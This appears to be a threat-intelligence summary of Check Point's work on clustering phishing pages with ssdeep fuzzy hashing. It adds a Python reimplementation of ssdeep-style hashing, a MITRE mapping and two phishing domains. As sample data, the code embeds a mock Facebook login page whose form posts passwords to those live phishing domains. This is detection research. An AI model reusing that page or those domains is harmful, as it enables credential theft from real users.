Identify Phishing and Malware Using Fuzzy Hashing

Fuzzy hashing with ssdeep fingerprints web pages so that a newly seen page can be matched against known malicious ones even when the two are not byte-for-byte identical. Check Point feeds ssdeep-based clusters of similar HTML source into ThreatCloud AI and its Zero Phishing engine, linking phishing and malware campaigns across the many domains that host them so they can be blocked as a group.
Hashtags: #ssdeep #ThreatCloudAI #CheckPoint #ZeroPhishing #FacebookPhishingCampaigns

Keypoints

  • Fuzzy hashing produces a digital fingerprint that still matches when two files differ slightly, unlike a cryptographic hash, which changes completely on a one-byte edit.
  • ssdeep is the tool used to generate the fuzzy hashes and to score how similar two pieces of content are.
  • Phishing detection is enhanced by clustering web pages whose HTML source code scores as similar.
  • The cluster methodology links phishing campaigns across domains, so a page is detected even when it is hosted somewhere new or lightly modified.
  • ThreatCloud AI leverages the ssdeep-based clusters to protect organizations from phishing.
  • Investigating the clusters improves understanding of phishing trends and evasion techniques, which feeds back into the detection logic.
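The fingerprint-and-cluster workflow the keypoints describe, as an added example that is not Check Point's or ssdeep's own code: a compact pure-Python re-implementation of ssdeep-style context-triggered piecewise hashing (rolling hash, block-size selection, signatures at two block sizes, weighted edit-distance score), run over three constructed HTML pages. Two are rendered from one made-up login-kit template and differ only in the hosting domain, for which the two domains listed under Indicators of Compromise are used; the third is an unrelated page of comparable size. The page contents, function names and the clustering threshold are assumptions for illustration, and the code approximates ssdeep's behaviour rather than reproducing its output byte for byte; production deployments should use ssdeep/libfuzzy itself.

```python
"""Added example, not Check Point's or ssdeep's code: a compact pure-Python version of
ssdeep-style context-triggered piecewise hashing (CTPH) for clustering look-alike pages."""
ROLL_WINDOW, MIN_BLOCKSIZE, SPAMSUM_LENGTH = 7, 3, 64  # ssdeep's constants
HASH_PRIME, HASH_INIT = 0x01000193, 0x28021967          # FNV-1 per-chunk hash
B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

def _rolling(data):
    """ssdeep's rolling hash of the last ROLL_WINDOW bytes: local, so boundaries re-sync after edits."""
    win, h1, h2, h3 = [0] * ROLL_WINDOW, 0, 0, 0
    for n, c in enumerate(data):
        h2 = (h2 - h1 + ROLL_WINDOW * c) & 0xFFFFFFFF
        h1 = (h1 + c - win[n % ROLL_WINDOW]) & 0xFFFFFFFF
        win[n % ROLL_WINDOW] = c
        h3 = ((h3 << 5) ^ c) & 0xFFFFFFFF
        yield (h1 + h2 + h3) & 0xFFFFFFFF

def _piecewise(data, bs):
    """One base64 char per chunk; a chunk ends where the rolling hash == bs - 1."""
    sig, h, pending = [], HASH_INIT, False
    for c, r in zip(data, _rolling(data)):
        h, pending = ((h * HASH_PRIME) & 0xFFFFFFFF) ^ c, True
        if r % bs == bs - 1 and len(sig) < SPAMSUM_LENGTH - 1:
            sig.append(B64[h & 63])
            h, pending = HASH_INIT, False
    if pending:
        sig.append(B64[h & 63])  # trailing partial chunk
    return "".join(sig)

def fuzzy_hash(data):
    """'bs:sig1:sig2'; sig2 is computed at 2*bs so hashes of neighbouring block sizes compare."""
    bs = MIN_BLOCKSIZE
    while bs * SPAMSUM_LENGTH < len(data):
        bs *= 2
    while True:
        sig1, sig2 = _piecewise(data, bs), _piecewise(data, 2 * bs)
        if bs == MIN_BLOCKSIZE or len(sig1) >= SPAMSUM_LENGTH // 2:
            return f"{bs}:{sig1}:{sig2}"
        bs //= 2  # too few chunks at this block size: halve and retry

def _edit_distance(a, b):
    """Levenshtein with ssdeep's weights: insert/delete cost 1, replace cost 2."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb) * 2))
        prev = cur
    return prev[-1]

def _score(s1, s2, bs):
    """0..100 similarity of two signatures computed at the same block size."""
    grams = {s1[i:i + ROLL_WINDOW] for i in range(len(s1) - ROLL_WINDOW + 1)}
    if not any(s2[i:i + ROLL_WINDOW] in grams for i in range(len(s2) - ROLL_WINDOW + 1)):
        return 0  # ssdeep requires a common 7-char run before it scores at all
    score = 100 - 100 * _edit_distance(s1, s2) // (len(s1) + len(s2))
    return min(score, bs // MIN_BLOCKSIZE * min(len(s1), len(s2)))  # small-input cap

def compare(h1, h2):
    """ssdeep-style comparison of two 'bs:sig1:sig2' strings, 0..100."""
    (bs1, a1, a2), (bs2, b1, b2) = h1.split(":"), h2.split(":")
    bs1, bs2 = int(bs1), int(bs2)
    if bs1 == bs2:
        return max(_score(a1, b1, bs1), _score(a2, b2, 2 * bs1))
    if bs1 == 2 * bs2:
        return _score(a1, b2, bs1)
    return _score(a2, b1, bs2) if bs2 == 2 * bs1 else 0  # else: not comparable

def cluster(pages, threshold=50):
    """Greedy grouping: a page joins the first cluster it scores >= threshold against."""
    hashes, clusters = {n: fuzzy_hash(b) for n, b in pages.items()}, []
    for name, h in hashes.items():
        for members in clusters:
            if any(compare(h, hashes[m]) >= threshold for m in members):
                members.append(name)
                break
        else:
            clusters.append([name])
    return clusters

# Constructed sample pages: two from one made-up login-kit template that differ only
# in the hosting domain (the two domains from the IoC list), plus an unrelated page.
KIT = ('<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Log in to Facebook</title><style>'
       'body{margin:0;font-family:Helvetica,Arial,sans-serif;background:#f0f2f5}.box{width:396px;margin:80px auto;'
       'padding:20px;background:#fff;border-radius:8px}input{width:100%;padding:14px 16px;margin:6px 0;border:1px '
       'solid #dddfe2;border-radius:6px;font-size:17px}</style></head><body><div class="box"><form id="f" '
       'method="post" action="https://{host}/api/login.php"><input type="text" name="email" placeholder="Email '
       'address or phone number"><input type="password" name="pass" placeholder="Password"><button type="submit">'
       'Log In</button></form><a href="https://{host}/recover.php">Forgotten password?</a></div><script>document.'
       'getElementById("f").onsubmit=function(){return document.getElementsByName("pass")[0].value.length>5};'
       '</script></body></html>')
PAGES = {
    "amplifyapp": KIT.replace("{host}", "feedbacdeveloper-case.d3nstmqzpmeow6.amplifyapp.com").encode(),
    "netlify": KIT.replace("{host}", "personal-interests-2437e1.netlify.app").encode(),
    "benign": ('<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Release notes 4.12</title></head>'
               '<body><main><article><h1>Release 4.12.0</h1><p>This release upgrades the build toolchain, removes the '
               'legacy XML exporter and fixes a race in the scheduler that could drop a job when two workers claimed it '
               'within the same millisecond.</p><h2>Breaking changes</h2><ul><li>Python 3.8 is no longer supported.'
               '</li></ul></article></main></body></html>').encode(),
}

if __name__ == "__main__":  # prints the pairwise scores, then the clusters
    hs = {n: fuzzy_hash(b) for n, b in PAGES.items()}
    print({(a, b): compare(hs[a], hs[b]) for a in hs for b in hs if a < b}, cluster(PAGES))
```

Running the module prints the pairwise scores and the clusters: the two kit pages land in one cluster while the unrelated page stays alone, because the scorer refuses to score at all without a common seven-character run in the signatures and returns 0 for block sizes more than one step apart. That last rule is the practical caveat for HTML clustering: a page padded or trimmed to a very different size is hashed at a different block size, so only the second signature (computed at twice the block size) keeps it comparable, and pages of comparable size cluster far more reliably than pages whose sizes differ by an order of magnitude.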

MITRE Techniques

  • [T1566] Phishing – Phishing pages are built from the same HTML structure and spread across many hosting domains; the ssdeep clusters tie those pages together (“Using similar HTML structures to create phishing pages” and “Employing different domains to host phishing campaigns”).
  • [T1203] Exploitation for Client Execution (listed on the page as “Malware”) – Malware samples that evade signature-based engines but still share code with known threats are caught by the same similarity clustering (“Utilizing malware that can evade signature-based detection engines” and “Creating malware that shares code similarities with known threats”).

Indicators of Compromise

  • [Domain] Phishing campaign hosting domains – feedbacdeveloper-case.d3nstmqzpmeow6.amplifyapp.com, personal-interests-2437e1.netlify.app

Read more: https://blog.checkpoint.com/security/enhancing-phishing-and-malware-detection-with-ssdeep-fuzzy-hashing/